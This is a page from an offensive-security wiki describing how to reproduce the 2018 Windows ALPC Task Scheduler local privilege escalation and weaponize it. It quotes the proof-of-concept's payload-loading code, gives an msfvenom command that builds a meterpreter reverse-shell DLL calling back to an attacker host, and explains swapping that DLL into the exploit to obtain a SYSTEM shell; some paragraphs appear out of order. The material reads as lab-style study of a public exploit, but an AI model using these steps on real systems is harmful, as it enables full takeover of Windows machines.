DarthSidious
  • Darth Sidious
  • GETTING STARTED
    • Getting started
    • External network access to Domain Admin
    • Intro to Windows hashes
  • Building a lab
    • Building a lab
    • Preparing Kali
    • Building a small lab
    • Building a lab with ESXI and Vagrant
    • Cuckoo malware analysis lab
  • Initial access
    • Password spraying
    • Initial access through exchange
  • ENUMERATION
    • Powershell
    • BloodHound
    • PowerView
    • Azure enumeration
  • Execution
    • Pass the hash
    • Responder with NTLM relay and Empire
    • DeathStar
    • CrackMapExec
  • Privilege escalation
    • Mimikatz
    • Token Impersonation
    • Juicy Potato
    • ALPC bug 0day
  • Defense evasion
    • Bypassing Applocker and Powershell contstrained language mode
    • From RDS app to Empire shell
    • Stealth
  • OTHER
    • Link encyclopedia
    • Writeups
      • lkylabs v1
    • War stories
      • Domain admin in 30 minutes
  • Credential access
    • Password cracking and auditing
  • Command & Control
    • SILENTTRINITY
Powered by GitBook
On this page
  • How to use
  • Windows 10 - works!
  • Server 2016 - works
  • Windows 7 - Nothing happens
  • Weaponization maybe?
  1. Privilege escalation

ALPC bug 0day

PreviousJuicy PotatoNextBypassing Applocker and Powershell contstrained language mode

Last updated 6 years ago

How to use

  • As a regular user, launch notepad. If you opened it from cmd, you get a subprocess notepad inside cmd. This thread runs with the user context you launched it with. Note that the PID of the notepad process is 3872

  • If you need to see username and integrity level in Process Explorer you can go to View -> Select columns and check

Now, have a look at the process spoolsv.exe which is basically where the actions is going to happen. Nothing much here yet.

Now fire the exploit off and see what happens (this is demonstrated in the PoC video). We use the PID of the notepad process we spawned earlier 3872

Now, it appears that nothing is happening, but take a look at spoolsv in Process Explorer again.

Bham! cmd.exe with subprocesses conhost and notepad has spawned as SYSTEM!

Windows 10 - works!

0day priv esc confirmed on Windows 10 1803. No patch has been released by MS yet (28.08.2018)

This could probably be tweaked to open an actual cmd window as SYSTEM instead of a windowless process in the background.

Edit on the above: @plaintext notified me that the processes spawn in session 0 which is why they won't be visible to the user which operations in session 1. If you toggle Session in the columns panel in ProcExplorer you can see that very clearly.

Server 2016 - works

Windows 7 - Nothing happens

Weaponization maybe?

After reading the source code I discovered that notepad is launched from the exploit.dll added as a Resource. This can be seen at line 101-105 in the source code.

//Payload is included as a resource, you need to modify this resource accordingly.
HRSRC myResource = ::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
unsigned int myResourceSize = ::SizeofResource(mod, myResource);
HGLOBAL myResourceData = ::LoadResource(mod, myResource);
void* pMyBinaryData = ::LockResource(myResourceData);

When clicking that one, we can see this exploit.dll which in the PoC just spawns notepad can't be read since I don't have it in that absolute path.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.0.16 lport=444 -f dll -o lol.dll

Select "Replace Resource (raw)" in CFF Explorer and provide the lol.dll. Then save the ALPC-TaskSched-LPE.dll as a new file. The entire exploit is now embedded into the dll file

So we fire of the exploit again, just like we did above and wait for our shell to come back.

Woop de doo we got a SYSTEM meterpreter.

A 0day for a local priv esc for Windows was published August 28th on Twitter by @sandboxescaper, whose account was pulled quickly. The PoC is on . The video posted with the PoC wasn't evident so I made a quick reproduction to verify whether it works, and it certainly does.

As Administrator, open - right click, "Run as administrator"

So instead of recompiling and fixing the 500 errors I got from visual studio I decided it was easier to replace the dll directly as a Resource with '. But before I did that I had to prepare the payload.

Github
Process Explorer
CFF Explorer
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
LogoWindows 0-day pops up out of nowhere TwitterTheRegister